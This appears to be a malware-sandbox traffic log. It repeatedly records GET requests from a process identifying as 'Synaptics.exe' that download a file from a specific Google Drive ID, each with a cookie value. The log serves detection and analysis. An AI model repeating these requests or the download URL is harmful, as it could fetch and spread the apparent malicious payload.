                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=L6_FFMSBlbZdTAMgj8jCUhdLqxuo9z-t63ZBtiJJsQ2GMQ60lQMTgBtQozcycb7jMD1ayILwp97LFVlFpGgTf5tu_mWm9ulruDzUsUIwQcY3jk5vPcsADCcs7436U-rufYqfhHp0EQckaCyk5cPdyCkCzllKZuCHwZwUn1XQ8zx76xDU_bMQ5SM
